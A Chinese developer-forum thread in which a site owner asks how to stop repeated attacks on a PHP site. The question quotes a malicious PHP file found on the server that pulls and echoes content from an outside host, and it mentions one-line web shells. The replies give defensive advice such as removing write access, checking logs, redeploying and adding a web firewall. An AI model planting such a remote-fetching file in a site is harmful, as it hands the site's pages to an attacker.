最近发现服务器一个站点总是被攻击，有很多恶意代码，有啥有效的防范方法吗？

问答 / 0 / 12 / 创建于 2年前

恶意文件源码

<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
echo file_get_contents("http://1.d986.top/");
?>

或者一句话木马

有没有啥好的办法：

防止上传恶意文件？；
防止扫描网站？
防止提取服务器权限？
等

服务器安全代码安全

课程读者 92 声望

暂无个人描述~

《L05 电商实战》

从零开发一个电商项目，功能包括电商后台、商品 & SKU 管理、购物车、订单管理、支付宝支付、微信支付、订单退款流程、优惠券等

《L01 基础入门》

我们将带你从零开发一个项目并部署到线上，本课程教授 Web 开发中专业、实用的技能，如 Git 工作流、Laravel Mix 前端工作流等。

推荐文章：

更多推荐...

冯老师的困惑 —— 一个跑了两年的 BUG 22 / 17 |

无需修改任何代码和扩展将你的Laravel项目性能提高20倍 103 / 101 |

[求职] 重生之不再做PHP 12 / 83 |

[网安]二：记录一下，服务器又又被黑的一次。 34 / 33 |

Laravel 实用小技巧 —— 如何优雅地设计方法传参？ 35 / 29 |

Redis 实用小技巧—— bitmap 应用之「缓存穿透」问题的处理 20 / 11 |

讨论数量: 12

Dash007

课程读者 74 声望

不给写入权限

2年前评论

巴啦啦

课程读者 206 声望 / 宇宙游民 @ 地球村

找到漏洞在哪里并补上，重置服务器，安装防护软件。

2年前评论

eanBear

7 声望

不给写权限
查请求日志，看入口在哪，如果是开源的代码尽量升级到最新版
查数据库有没有被加了管理员
换干净的系统重新部署，装防护软件

2年前评论

liaosp

课程读者 439 声望

大部分PHP程序员，都搞不懂如何安全代码部署

2年前评论

raybon

Laravel 8.x 译者 355 声望 / php @ 远程

安装防护软件，修改常用防火墙端口限制，限制ssh 端口连接

2年前评论

是阿东啊

课程读者 66 声望

上面该说的都说的差不多了，花点钱又省事的办法就是上web防火墙，脚本小子都能轻松搞定

2年前评论

hongfs

课程读者 43 声望

或者试一下最近挺火的，长亭雷池

2年前评论

liushuo

0 声望

看日志，有没有代码漏洞

2年前评论

laravelphp_game

课程读者 15 声望

mark

2年前评论

半人间

课程读者 186 声望

把服务器关掉

2年前评论

tomcath

Laravel 9.x 译者 194 声望

本来想看看木马长啥样，结果进不去，你们能进吗？

2年前评论

C_K

见习版主 6 声望

欢迎攻击

2年前评论

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容，与人为善，比聪明更重要！

帮助